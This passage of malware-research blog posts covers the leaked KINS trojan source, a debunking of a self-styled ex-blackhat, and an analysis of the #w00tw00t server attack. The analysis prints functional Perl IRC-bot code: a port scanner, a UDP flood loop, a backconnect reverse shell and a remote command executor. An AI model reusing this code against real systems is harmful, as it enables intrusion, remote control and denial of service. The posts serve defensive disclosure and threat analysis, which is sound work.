"Grab_all;" - Rob everything - all FTP data that are recorded by a list of 
all email-i + contacts uchetka ,
Cookies IE and FF ( after sending the admin area as possible are removed ) , 
and certificates MY store ( exported to the admin certificates under the password "GCert")
"Grab_emails;" - grabbing only the email adresses .
"Grab_ftps;" - grabbing only FTP .
"Grab_certs;" - grabbing only certificates.
"Grab_sol;" - salt- grabbing cookies .
The record of a line of several arguments. Each argument must end with "" .
Load module files , add to the value associated with the core bot32.dll

Code Sharing Details

I wrapped up all of the codes into a 7zip after confirming the authenticity and be available for a clean share and you can download safely from here -->[MalwareMustDie MediaFire]
This source code is very important to filter the several evading techniques used by similar variants, with also planning a mitigation for the Bootkit implementation of the malware, I really hope AV industry will use this code well for their products implementation.

Before you download please see the size, MD5 hash, date and filename well as per mentioned in the below movie. In additional, there are countries that forbidding the owned of malware source, so if you want to view what's in the source code package, you don't have to downloaded it, but you can see it in the below movie I just took, to get the idea what the source actually contained:

The share limitation and rules

The password will be shared to the known security researchers and all anti-virus industry ONLY, please contact us by twitter's mention, or by email if you know how to reach me already. We share this information for the purpose to raise detection ratio of the threat and for the mitigation purpose. Any other purpose (even it sounds legitimate) will be rejected without notification or to be put into the lower priority. This is a recent and dangerous malware code, and evil malicious source code, a cyber crime tool, our sharing method in this subject is not a democracy nor discussion, please understand. So please present your self, your work and your purpose well.

Thank you for the good Crusader that leaked the source directly to us. God bless you.

References:

1. Technical Overview (Bootkit+Evade Wow64): KINS Source Code Leaked (Touch My Malware), link-->HERE
2. In depth analysis: Having a look on the KINS Toolkit (Xylibox), link-->HERE
3. Article: New Trojan #INTH3WILD: Is Cybercrime Ready to Crown a New “KINS”? (RSA Blog), link-->HERE

Kudoz friends in arms who read codez!

Luv you all! Stay secure! ( ^-^)v

The password is a tribute to a good young friend crusader with a very big heart!

#MalwareMustDie!

Intelligence report. Beware: Trojan7sec, A wolf in sheep's skin

October 11, 2013, 10:14 am
$
0
0
In reversing malware we have to deal with codes and its behavior, thinking backwards. connecting logic on the collected data to go figure how the malicious scheme works.This case is rather unusual, we reverse the social engineering malicious act. Which is way much complicated than reversing a malware code. The concept is the same but instead of codes we need to deal with facts, tracing one fact to another to find the real malicious concept behind it. The big difference between these two reversing concept is, dealing with malware code is easier since codes itself never lies (yes they are some manipulation or tricks but is all readable), but the malicious actor behind social engineering does. Here's the details:

Internet is media that was designed by UNIX engineer gentlemen with the good hope and heart to make people easier to communicate to each other around the globe. So some people think they can lie by online in internet, by faking some personalities, pretend to be good but actually doing bad activities in behind. These people maybe think "who knows?"
In malware fighting, to counter cyber crime, is important to cook our intelligence well, and we in #MalwareMustDie are good in nailing these liar / imposter cases. This is a one disclosure of the case.

For this investigation purpose we are pretending to accept the subject for the close intelligence activities, which the project is done now. Herewith we are Announcing and Clarify that the subject is NOT having anything related to #MalwareMustDie.

Trojan7sec

A lot of you have probably noticed a so called "security researcher" claiming to be an "ex-blackhat" with quite an impressive skillset and background. For those who have not read his post about his background, here is a link and here is a mirror of the post in case it is taken down. There is also a second post about himself link here and mirror here. We will be debunking these posts so the people who have fallen for his stories can tell the facts from fiction. 

Breaking it down


This is probably the most obvious lie to anyone with any security background at all. This claim has many holes, I will go through each.

Botnet Estimates vs Actual
Botmaster usually have a fairly accurate way to determine the number of bots, usually via unique id's that are assigned to each computer on infection. Because security experts very rarely gain access to the botnet command and control panel, the estimated number of bots is mostly calculated by monitoring the C&C servers and logging the unique ips over the course of a month. If you understand IPv4, you'll know that there are far less IPV4 addresses than there are compters, in an effort to combat this, ISPs use a method called "IP Pooling", this simply means instead of assigning each client with a permanent IP Address, the ISP will maintain a collection of IPs that will be assigned on the fly (when a client logs on to the internet, they will be given an IP at random). Because so many ISPs use IP pooling, over the course of a month far more IPs would be logged than there are infected computers, resulting in the total number of estimated infections being far more than the actual.

Large Botnets That Fit The Description
Bearing in mind that botnet estimates are usually way over, the biggest botnet ever is thought to be conficker with an estimated 10 - 15 million infections. Conficker did not produce much spam compared to some of the much smaller botnets, it was also not involved in banking fraud, keylogging or form-grabbing, so conficker is off the table. Now we are not going to bore you by going through every single botnet and showing you how it doesn't fit that claim, so we'll cut to the chase. No recorded botnet over 1 million bots fits all those characteristics.

Stating The Obvious
There is zero chance that a botnet of that size would go unnoticed, never-mind one of the people involved then giving up and going to twitter to talk about it, the fact he owns a gym and what country he lives in (people have gone to jail for far smaller mistakes). We'd also like to state that no one with a botnet of that size would bother with DDoS, the money made from launching denial of service attacks wouldn't even amount to 0.1% of the potential botnet revenue, it would also draw unnecessary attention.


At a first glance this is probably believable to even people with a security background, although we cannot fully disprove this, we can state why it is highly unlikely.

Malware Marketplace
Nearly all of the the high level malware marketplaces are Russian-speaking only, Trojan7Sec is living in England, he does not speak any Russian, which limits him to English speaking forums (We could count the number of banking trojans sold on English forums on 1 finger). Of course he could have someone who is Russian-speaking sell the product for him, but it's very unlikely.

Quality of Code
We'd estimate the average price of a professional bot with said features at about $2k - $5k, 10k would be a push and likely come from a very advanced programmer. Here is some code Trojan7sec posted on his blog a month after he wrote the above post: Link, Mirror. This code is very beginner and low quality, it is not the code you'd expect from someone who can code HTML inject at all, never-mind an expensive piece of malware.

Firstly you'll notice there is no error checking whatsoever, if any of the GetModuleHandle or GetProcAddress calls were to fail, the code would crash the browser on injection.
Secondly you'll notice this "while(Process32Next(handle, &ProcessInfo))", there is no call to Process32First which is generally what anyone with any programming background would do.
Lastly he doesn't close the thread handle, or the snapshot handle. It's hardly the end of the world, but it's something any competent programmer would know to do.

There's also the non standard and over the top use of the #define directive as well as the unnecessary use of strcpy on data that could have been initialized during compile. This is not the code you'd see from a professional malware coder selling code for $10k - $20k, this is the code you'd see from a member of hackforums selling a $100 bot.


This is probably the only true statement, It's clear Trojan7Sec is a pathological liar, however "believable" may be a slight overstatement (saying that, some of his stories did make it to big news sites).


Again, more of the same. This time the number is rounded up to an even more unlikely 20 million, We also learn that his botnets uses tor, msn and peer to peer to communicate. If you remember recent news, a botnet of around 400k computers started using tor and was the talk of the internet. Not only would a botnet of the size being talked about here be noticed, but would likely grind the entire tor network to a halt. It is agreed upon by a lot of researcher that peer to peer botnets are the most complex to develop, not the sort of thing you'd expect someone who only knows C++ at an entry level. It is also important to add, that using IM services like MSN to control bots is  ridiculous and the concept is limited to very small botnets and malware usually written by script-kiddies.

/r/netsec

If we do some digging on Trojan7sec, we can find a post on the netsec subreddit that he authored. Although it was deleted due to large amounts of lies, we can find the original comments here. The post is in the form of an IAMA (this means I Am A ... Ask Me Anything). Sadly, this post made it to news sites such as softpedia and welivesecurity, drawing attention away from real problem. 


(Note - If anyone can find a mirror of the full post, please leave a comment with the link or email us)

UPDATE: The REDDIT posts was restored back and accessible now:

Inspiration

The first thing we noticed is similarities between the original post and this, It is likely that Trojan7Sec got his inspiration for the "AMA" from the one written by the skynet botnet developer over a year ago. It's also interesting to note that if you look at the post date, despite being posted around the same time as the blog post, there is a 12 million difference in the alleged number of bots. 

Debunking The Comments

Just in case anyone doubts this is Trojan7sec's reddit post


This is interesting, anyone who works in the malware research industry knows that java malware is notoriously easy to detect. Not only has there never been any record of such a large botnet using java, it's a well known fact that there are not enough targetable OS X and Linux computers running java for it to be worth the loss of windows infections. This is the reason that pretty much all big botnets use native windows executables and are not cross-platform. 

Java malware is only really used by professional botmaster for targeting android devices. If you were to visit a beginner oriented hacking forum, such as hackforums, you would notice an abundance of java malware. This is due to java appealing to script-kiddies because it is easier to write malware with, it is also more suited to beginner botmaster because java application are usually ignored by antiviruses (this would be helpful to someone with little knowledge of advanced rootkit or antivirus evasion techniques).



This is the sort of thing someone pretending to be a mastermind cybercriminal would say, making 15-20k per an hour does not get you out of jail, if someone with Trojan7sec's alleged track record was arrested, it would likely result in the rest of his life in jail. We'll just throw it out there: 20k in 1 hour is a potential 175 million a year, It's up to you if you believe this person had that much earning potential, then gave it all up to sit on twitter insulting security researchers. 



After consulting with many people, blackhat and whitehat, we can conclude that no such board exist. Some private boards (nearly always Russian-speaking ones) do implement a signup fee of $50 - $1000, this fee is to deter low level law enforcement and security researcher who do not want to pay money to profile a forum. $20,000 is a lot of money, more than some people make in a year, a fee so large would deter just about everyone except for very rich cybercriminals, this would of course make the forum a prime target for the FBI (who do have $20,000 to spend on a forum account). 

We also mentioned earlier that Trojan7Sec is English, the most exclusive English hacking forum is darkode, which is so easy to get into that the forum user-base has more security researchers than legitimate members.


Further, the subject in this post explained, the person arrested in Israel and asked to help defend against cybercrime was Hamza Bendelladj, a botmaster and seller for spyspreader known online as BX1. Hamza was not the Zeus coder and had nothing to do with Zeus (other than using it). Anyone who had access to any private forums would know this fact, only script-kiddie oriented forums such as hackforums were spreading rumors that said otherwise. Furthermore, the real story of BX1 is actually as per described in below:

Deleted Tweets of Trojan7Sec

These are some now deleted tweet of Trojan7sec talking about the bot he spent 4 and a half years coding. Here is a list of features, you'll notice some features such as polymorphic encryption and bootkit, such features he is certainly not capable of coding and are likely taken from the carberp leak.

0-Days

Looking at trojan7sec's twitter, blog and reddit, we see the word "0-day" thrown around constantly. Contrary to popular belief, zero-day exploits are incredibly rare on the blackhat scene. Even advanced malware such as TDL and Rovnix uses patched exploits. Especially with the rise of bug bounty programs, if any malware were to use an 0-day exploit, it would be reported as soon as it was seen. 0-day exploits take a great amount of work and are patched very quickly, professional malware developers soon realized that using recently patched exploits was more effective (very few people update software regularly).

"0-Day" is a word that wannabe black-hats throw around to get attention, anyone with little knowledge of how the black-market works would think that 0-day exploits are far more common that they actually are, leading to the constant use of the term.

How and Why

A lot of you are probably wondering why we did this, It's simple. People like Trojan7Sec who make up stories then "become whitehat" draw attention away from the real issue. There are people working day and night doing their best to prevent and destroy malware, they get very little recognition and not a lot of pay. Along comes someone with what looks like a lot of experience and impressive background story, they then sit on twitter insulting hard working security researchers and antivirus companies, as well as feeding false and misleading information to amateur researcher who have been drawn into their web of lies. We have enough evidence to believe that Trojan7sec is very much still a blackhat and is likely only pretending to be whitehat for publicity. 

While writing this article we have consulted with researchers, blackhats, and programmers in order to make sure everything we say is as accurate as possible. For those of you who are actually whitehat, keep up the good work and remember:

"Thou Shalt Not Lie.. When the truth reveals, it will hurt you!"

Additional:


#MalwareMustDie. 

A Disclosure of What's Behind the #w00tw00t Attack

October 20, 2013, 11:58 am
$
0
0

Background..

Not so long ago I received this attack came into our web server:

That was actually the first time of attack series we received as per listed here-->PASTEBIN
Had it enough, so I started to investigate this matter thoroughly. With the help from @malm0u53 I was lead to the source of attack, and start digging deeper over there to find stuffs that are malicious enough to make good person got shocked.

This report actually contains many way to mitigate the similar attack in the future, and also for understanding the source and nature of the current threat. For the Firewall/IPS/IDS filtration research, maybe this poor English writing can be used as reference. I will share the samples upon ready, contains very dangerous tool-kits & packages found.
Following is the report in details..

Tracking..

First I made classification of the IP addresses: 

118.26.203.66
211.162.16.164
58.211.18.184
197.221.26.250
2.228.117.30
46.105.124.119 
212.227.251.6
Seeing the details of each IP..to prioritize the examination: 
DATE                        | IP           | REVERSE                         | ASN  | NETWORK PREFIX  | AS CODE         | cn | ISP CODE            | ISP NAME
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Sun Oct 20 22:18:15 JST 2013|118.26.203.66 | -                               |23724 | 118.26.200.0/21 | CHINANET-IDC-BJ | CN | -                   | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
Sun Oct 20 22:16:47 JST 2013|211.162.16.164| -                               |4837  | 211.162.16.0/20 | CHINA169        | CN | SZGWBN.NET          | BEIJING GUOXIN BILIN TELECOM TECHNOLOGY CO. LTD
Sun Oct 20 21:23:04 JST 2013|58.211.18.184 | -                               |23650 | 58.211.16.0/21  | CHINANET-JS-AS  | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Sun Oct 20 21:23:03 JST 2013|197.221.26.250| -                               |37153 | 197.221.0.0/18  | HETZNE          | ZA | YOUR-SERVER.CO.ZA   | HETZNER (PTY) LTD
Sun Oct 20 21:23:06 JST 2013|2.228.117.30  |2-228-117-30.ip191.fastwebnet.it.|12874 | 2.224.0.0/13    | FASTWEB         | IT | FASTWEBNET.IT       | FUTURA ENTERPRISE
Sun Oct 20 21:23:08 JST 2013|46.105.124.119|poc2.polyspot.com.               |16276 | 46.105.0.0/16   | OVH             | FR | OVH.COM             | OVH SYSTEMS
Sun Oct 20 21:23:09 JST 2013|212.227.251.6 |s15378439.onlinehome-server.info.|8560  | 212.227.0.0/16  | ONEANDONE       | DE | 1AND1.CO.UK         | 1&1 INTERNET AG
Using lynx to check the validity of HTTP status in each server... 
$ lynx -head -dump http://197.221.26.250
Looking up 197.221.26.250
Making HTTP connection to 197.221.26.250
Alert!: Unable to connect to remote host.
lynx: Can't access startfile http://197.221.26.250/

$ lynx -head -dump http://2.228.117.30
^C (Time out..)

$ lynx -head -dump http://211.162.16.164
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 23:39:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 13 Oct 2013 21:40:12 GMT
ETag: "19958040-9d6-4e8a6323e4700"
Accept-Ranges: bytes
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8

$ lynx -head -dump http://58.211.18.184
HTTP/1.1 302 Moved Temporarily
Location: http://58.211.18.184/index.jsp
Content-Type: text/plain
Content-Length: 0
Date: Sun, 20 Oct 2013 12:29:23 GMT
Server: Apache Coyote/1.0
Connection: close

$ lynx -head -dump http://46.105.124.119
HTTP/1.1 404 Not Found
Date: Sun, 20 Oct 2013 12:31:04 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1

$ lynx -head -dump http://212.227.251.6
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 12:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Leaving me the two suspected IP of: 
212.227.251.6
211.162.16.164
The first IP: 212.227.251.6 was ending up into a cleaned up site.. 
GET / HTTP/1.1
Host: 212.227.251.6
User-Agent: BeastMalwareMustDieZilla
Referer: http://malwaremustdie.org
Connection: close

HTTP/1.1・200・OK(CR)(LF)
Date:・Sun,・20・Oct・2013・12:36:21・GMT(CR)(LF)
Server:・Apache/2.2.3・(Red・Hat)(CR)(LF)
X-Powered-By:・PHP/5.1.6(CR)(LF)
Content-Length:・312(CR)(LF)
Connection:・close(CR)(LF)
Content-Type:・text/html(CR)(LF)
(CR)(LF)

<!DOCTYPE・HTML・PUBLIC・"-//W3C//DTD・HTML・4.01//EN"・"http://www.w3.org/TR/html4/strict.dtd">(LF)
(LF)
<html>(LF)
<head>(LF)
<title>Pegasus・Host・|・Alojamiento・Web</title>(LF)
<link・rel="Stylesheet"・href="ph.css"・media="screen"・/>(LF)
</head>(LF)
(LF)
<body>(LF)
<img・src="./ph.jpg"・alt="Image・-・Pegasus・Host"・/><br・/>(LF)
p(E1)gina・temporal(LF)
(LF)
</body>(LF)
</html>(LF)
While 211.162.16.164 (thank's to MalMouse for noticing this!) lead us into the source of attack:

In the source:

Let's enlarge the point that described the source:
Well, this is what the source of the attack, a hacked site, I marked in green color the hack files..the site itself is full of the URL redirection that I can not comment as clean site itself, but I will focus to the w00tw00t attack component only: 
Connected to 37.1.192.220.
220 FTP Server ready.
Name (37.1.192.220:rik): test
331 Password required for test
Password:
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alF
229 Entering Extended Passive Mode (|||1460|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x  18 test     admin        4096 Sep  2 20:22  /
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ./
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ../
-rw-r--r--   1 test     admin           7 Oct 12 10:51 .codepage
-rw-r--r--   1 test     admin       37287 Oct 13 15:53 .dsf
drwx------   2 test     admin        4096 Aug 24 08:25 bin-tmp/
-rw-r--r--   1 test     admin    10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--   1 test     admin       19609 Oct  1 19:11 "bot.zip"
drwxr-x--x   2 test     admin        4096 Aug  7  2012 email/
drwxr-xr-x   2 test     admin        4096 Nov 27  2012 etc/
drwxr-xr-x   4 test     admin        4096 Nov 26  2012 home/
-rw-r--r--   1 test     admin        2043 Oct  8 08:58 "logclean"
-rw-r--r--   1 test     admin         650 Oct  8 08:58 "logclean.tgz"
drwxrws---   2 apache   admin      757760 Oct 20 14:16 mod-tmp/
-rw-r--r--   1 test     admin         416 Oct 12 09:17 "muhrc"
-rw-r--r--   1 test     admin       37281 Oct 13 16:34 "perl"
drwxr-x--x   2 test     admin        4096 Aug 18 11:18 php-bin/
-rw-r--r--   1 test     admin      480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--   1 test     admin          76 Oct 11 10:16 "psybnc.conf"
-rw-r--r--   1 test     admin      130892 Oct 13 18:02 "screen.tar"
-rw-r--r--   1 test     admin       96937 Oct  8 08:56 "test.txt"
lrwxrwxrwx   1 apache   admin           7 Aug  7  2012 tmp -> mod-tmp/
-rw-r--r--   1 test     admin        3623 Sep 30 12:30 "unrealircd.conf"
-rw-r--r--   1 test     admin       84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--   1 test     admin    37026699 Oct  6 13:12 "vulnmare"
drwxr-x--x  11 test     admin        4096 Sep 15 13:00 www/
-rw-r--r--   1 test     admin        5323 Oct 12 14:29 "x.pl"
-rw-r--r--   1 test     admin       11934 Oct  7 19:19 "xvuln.txt"
226 Transfer complete
And yes, I grab them all..

Threat Components..

The below files is the list and log used for the w00tw00t attack: 

-rw-r--r--   1 test     admin       84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--   1 test     admin    37026699 Oct  6 13:12 "vulnmare"
-rw-r--r--   1 test     admin       11934 Oct  7 19:19 "xvuln.txt"
And the below file is the w00tw00t attack script itself: 
-rw-r--r--   1 test     admin        5323 Oct 12 14:29 "x.pl"
These files are the set of the hacking tools injected to this site: 
-rw-r--r--   1 test     admin         650 Oct  8 08:58 "logclean.tgz"
-rw-r--r--   1 test     admin      480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--   1 test     admin      130892 Oct 13 18:02 "screen.tar"
-rw-r--r--   1 test     admin       19609 Oct  1 19:11 "bot.zip"
-rw-r--r--   1 test     admin    10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--   1 test     admin       37281 Oct 13 16:34 "perl"

PS: the blackcat.jpg is actually a GZIP: 
Ziped component #0
Compression Deflated
ExtraFlags (none)
Flags (none)
ModifyDate 2009:10:15 03:21:19-07:00
4 years, 5 days, 4 hours, 31 minutes, 25 seconds ago
OperatingSystem Unix
File Size 9.9 MB
File Type GZIP
MIME Type application/x-gzip

Peeling the Code: w00tw00t Attack Script - x.pl

Was written in pure Perl, the script is used to pwned the web server which having the vulnerable PHP, with injecting thus extracting all of the "package" files injected to the compromised server, and start to connect the server to the "master" via IRC channel. Below is the breakdown of the codes for the image: Using these Perl modules: 

#!/usr/bin/perl

# MODULES

#use warnings;
use Parallel::ForkManager;
use IO::Socket;
use URI::_foreign;
use URI::_generic;
use URI::_query;
require URI::_foreign;
use URI;
use LWP;
use LWP::Simple;
use LWP::UserAgent;
use LWP::Protocol::http;
use URI::http;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use HTML::Parser;
use Parallel::ForkManager;
use IO::Socket;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use Getopt::Long;
use Time::HiRes qw(gettimeofday);
use MIME::Base64;
How they define the User-Agent, Time Out, Payload & shell: 
#use strict;
my $ua = LWP::UserAgent->new(agent =>"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $hostfile="vuln.txt";
my $word=".dsf";
my $maximumprocess="50";
my $hiddenprocess='/usr/sbin/sshd                                                                                                              ';
my $eth="eth0";
my $spd='7';
my $scanclassb;
my $scanclassa;
my $explhost;
my $explpayhost;
my $explpayloadfile;
This is where the exploitation & its component was defined: 
GetOptions(
'exploit|x' => \&exploit,
'h|hostfile=s'    => \$hostfile,
'p|paths=s' => \$word,
't|threads=s'      => \$maximumprocess,
'help'        => \&usage,
'hide=s'                => \$hiddenprocess,
'b=s'           => \$scanclassb,
'a=s'           => \$scanclassa,
'i=s'           => \$eth,
'spd=s'         => \$spd,
'r'             => \&rev,
'host=s' => \$explpayhost,
'clean|sterge' => \&sterge,
The ATTACK logic of #w00tw00t used in this attack is very simple...

With some error trapping and.. they're not very friendly to their users...

Here's the main exploit function, noted: the extracting the PMA hacking tools to pwn the server:


Finally the scan wit activating PMA toolkit..and deletion of the toolkit extracted components..

Post #w00tw00t pwned..(1) The Evil Redirection Service

This is the main concept of the attack, explaining WHY this server has so many "weird" redirections.
This server itself was pawned and becoming host of evil redirection service, as per one of some dir below: 

ftp> cd bin-tmp/
250 CWD command successful
ftp> ls -alF
229 Entering Extended Passive Mode (|||49723|)
150 Opening ASCII mode data connection for file list
drwx------   2 test     admin        4096 Aug 24 08:25 ./
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ../
-rwx------   1 test     admin        4564 Jun 15  2007 cgi.php*
-rw-------   1 test     admin         198 Aug 24 08:22 sess_02b1133c97f1cfe501c49939044db715
-rw-------   1 test     admin         233 Aug 24 08:23 sess_09e938787c74a1345b62c0cddb6e7ffb
-rw-------   1 test     admin           0 Aug 24 08:23 sess_0ea5482947611be5265c62949367ac1c
-rw-------   1 test     admin         203 Aug 24 08:24 sess_103115f99c01d5a2f99a000c17e413c2
-rw-------   1 test     admin           0 Aug 24 08:23 sess_145adf08b9432c2884dd4f174ebeb7d3
[...]
Inside the session or redirection: 
"Disney??"
$ cat sess_02b1133c97f1cfe501c49939044db715
mobile_disable|i:0;mobile_enable|i:0;dle_user_id|i:0;dle_password|s:0:"";referrer|s:107:"/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html";

"AntiVirus??"
$ cat sess_0b7d8l6ha6m4o0dedbkimdmhe4
mobile_disable|i:0;mobile_enable|i:0;referrer|s:73:"/bezopasnost/antivirus/1151-kiskav-2011-sbros-triala-trial-reset-new.html";
Format of the redirection itself: 
mobile_disable|i:0;
mobile_enable|i:0;
dle_user_id|s:4:"3405";
dle_password|s:32:"ed7603cfd1904e27a05a53718a464eed";
member_lasttime|s:10:"1381781518";
referrer|s:42:"/index.php?subaction=userinfo&user=barmost";
A simple grep to extract all redirection: 
$ cat *|grep -E -i -o "\/[a-z0-9]{1,}\/[a-z0-9]{1,}\/[a-z0-9\-]{1,}.html"
/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html
/igry/avtosimulyatory/14638-18-stalnyh-koles-ekstremalnye-dalnoboyschiki-2-18-wheels-of-steel-extreme-trucker-2-2011-rus-repack-ot-fenixx.html
/filmy/dokumentalnye/29022-freddie-mercury-the-great-pretender-freddi-merkyuri-velikiy-pritvorschik-2012-hdtv.html
/soft/grafika/25607-domashnyaya-fotostudiya-521-portable-by-samdel.html
/soft/utility/1194-connectify-pro-32022201.html
/soft/grafika/1207-cover-expert-20527-repack-3d-modelirovanie.html
/music/pop/29049-dancing-planet-vol-3-2013.html
/music/pop/29050-zarubezhnyy-svezhachok-2-2013.html
/filmy/uzhasy/26232-tehasskaya-reznya-benzopiloy-3d-texas-chainsaw-3d-2013-bdrip-avc.html
/soft/grafika/14107-face-off-max-3456.html
/music/shanson/29051-va-bezdna-letnego-shansona-versiya-4-2013.html
/music/classic/29039-va-vivaldi-genii-klassicheskoy-muzyki-2012-alac.html
/music/rock/29023-deep-purple-wacken-2013-2013-hdtv.html
/music/rock/29038-ddt-rozhdennyy-v-sssr-2004-dvd5.html
/filmy/dokumentalnye/7509-russkie-sensacii-vip-s-bolshoy-dorogi-efir-24032012-satrip.html
/music/pop/29021-va-80s-dance-deluxe-collection-2013-mp3.html
If you se the inside of CGP.PHP file itself is a PHPSHEL v1.7:

Post #w00tw00t pwned..(2) The Network Attack Tool (Portscnner, DDoS, etc)

Not a surprise anymore to find an attack tool in the case like this, it seems like is the part of the package actually. Below is the snippet code used for the attack (the snipped codes was cut and modified, so it is "neutralized"). File: 

-rw-r--r--   1 test     admin       37281 Oct 13 16:34 perl
(this is the shadow of the below file, self copied by the main script)
-rw-r--r--   1 test     admin       37287 Oct 13 15:53 .dsf
Below are the evil code snippets for the PoC purpose:

The Port Scanner: 

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

     # Quick scan
           if ($funcarg =~ /^ps (.*)/) {
             my $hostip="$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
         sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
                }
             }
             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
             } else {
                 sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
[...]
The "Nmap"(?) 
# NMAP, lol
           elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/)
      {
              my $hostname="$1";
              my $portstart = "$2";
               my $portend = "$3";
               my (@abertas, %porta_banner);
          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
               foreach my $porta ($portstart..$portend)
             {
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
               if ($scansock) {
                 push (@abertas, $porta);
                 $scansock->close;
                 if ($xstats)       {
                   sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); }}}
             if (@abertas) {
          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002");  }}
[...]
UDP For Flood: 
[...] elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
              return unless $pacotes;
              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
              my $alvo=inet_aton("$1");
              my $porta = "$2";
              my $tempo = "$3";
              my $pacote;
              my $pacotese;
              my $fim = time + $tempo;
              my $pacota = 1;
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Get BOMbs)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
              while (($pacota == "1") && ($pacotes == "1")) {
                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
                $pacote=$rand x $rand x $rand;
                $porta = int(rand 65000) +1 if ($porta == "0");
                send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
              }
              if ($xstats)
              {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Send\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");}}
[...]
Backdoor, the "BackConnect"
# Backconnect
            elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
         system("cd /tmp/.mrx");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
[...]
Shell.. 
sub shell {
  return unless $shellaccess;
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c >= "$linas_max") {
               $c=0;
[...]

Preview Video for the etc Hack Toolkit packages used (is an evidence of crime)

I can not discuss the other tool kits found for I am running out of time to write..there are so many of them!
But those tools really explain us a lot of details on what MO if the hack action is, you will see many tool-set with the ELF binaries insides, some are Open Source software that being mis-used for this malicious purpose. To make a good overview of the other tools used, I tried to open the archive of those hack-tools package one by one and recorded it in a video for you to view safely:

Who is the attacker?

The attack itself is controlled by a bad actor hidden behind an IRC connectivity , below I disclose the IRC configuration used by this case's attacker, contains the source of the IRC's IP, User's ID, IRC channel, Nicknames/Handles used for conducting the attack, is a check-mate: 

-rw-r--r--   1 test     admin         416 Oct 12 09:17 muhrc

$ cat muhrc
nickname = "TaLa";
altnickname = "TaLa";
username = "wait";
realname = "TaLa's juppah ;-)";
password = "make";
listenport = 123456;
awayreason = "so we begin ;)";
servers {
"irc.undernet.org":6667
};
